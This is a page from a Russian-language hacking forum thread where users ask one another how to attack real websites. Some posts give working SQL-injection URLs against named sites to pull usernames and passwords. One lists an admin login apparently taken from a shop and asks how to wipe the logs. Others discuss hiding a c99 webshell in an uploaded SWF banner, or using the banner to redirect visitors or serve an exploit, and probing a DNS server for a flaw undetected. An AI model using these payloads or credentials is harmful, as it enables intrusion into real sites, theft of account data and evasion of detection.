HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 376 из 2438 « Первая < 276326366 372 373 374 375 376 377 378 379 380 3864264768761376 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3751  
Старый 19.11.2008, 17:53
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
Цитата:
Сообщение от criz  
узнай че висит на сервере
Я новичек поэтому жаргон еще не совсем знаю...
Сори за тупой вопрос... А висит на сервере это типа какие демоны запущены или что? и искать эксплойт под ядро операционки или под какую то другую лажу?
 
Ответить с цитированием

  #3752  
Старый 19.11.2008, 18:05
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
Цитата:
Сообщение от criz  
стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать
смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304
 
Ответить с цитированием

swf - баннеры
  #3753  
Старый 19.11.2008, 18:40
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
Exclamation swf - баннеры
Вопрос такой:
могу заливать и вешать баннеры на одном хосте.
проверки антивирем содержимого баннера нету, фильтрация по расширению не стоит (вроде как).
Директорию, куда пишутся файлы не получилось определить, и походу там есть несколько моих вебшеллов :-/

возможно ли записать в тело баннера код, который бы автоматичевки выполнялся при загрузке баннера?
что можно выжать максимально из возможности заливки и вывешивания баннеров (что-то вроде iframe, автоматической переадресации на "нужный сайт", запихнуть в него сплоит. или что нибудь в таком духе)

В вопросе по устройству и возможностях swf-файлов ничего не знаю, вот и задаю вопрос (-
 
Ответить с цитированием

  #3754  
Старый 19.11.2008, 18:42
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию
Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
 
Ответить с цитированием

  #3755  
Старый 19.11.2008, 19:07
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
Цитата:
Сообщение от ThreeD  
Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
баннер это не картинка, a "Shockvawe Flash Object" :-\ анимашка.

Код:
data="http://_______/banners/c99madshell.php.SWF"
.........
<param name="movie" value="banners/c99madshell.php.SWF">
захожу в дерикторию /banners/ и она пустая, файлов нет Х___х
нужны действующие способы (- репой закидаю (-
 
Ответить с цитированием

  #3756  
Старый 19.11.2008, 19:54
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум
 
Ответить с цитированием

  #3757  
Старый 19.11.2008, 20:09
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Цитата:
смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304
не прокатит, потому что это не эксплоит, а шеллкод
 
Ответить с цитированием

  #3758  
Старый 19.11.2008, 20:29
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
sergey : q1w2e3
там есть менюшка с логами , вот как их отчистить?
 
Ответить с цитированием

  #3759  
Старый 19.11.2008, 23:39
_nic
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851

Репутация: 107


По умолчанию
Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?
 
Ответить с цитированием

  #3760  
Старый 19.11.2008, 23:57
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624

Репутация: 10
По умолчанию
Помогите все знаю, но логин и пасс не могу выташить
_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat_ws(0x3a3a,column_nam e),5,6,7+from+information_schema.columns+where+tab le_name=char(112,111,108,108,95,117,115,101,114)--


_http://www.gamesector.org/review.php?id=-297+union+select+1,2,3,concat(username,

0x3a,userpass),5,6,7+from+poll_user--
 
Ответить с цитированием
Ответ
Страница 376 из 2438 « Первая < 276326366 372 373 374 375 376 377 378 379 380 3864264768761376 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ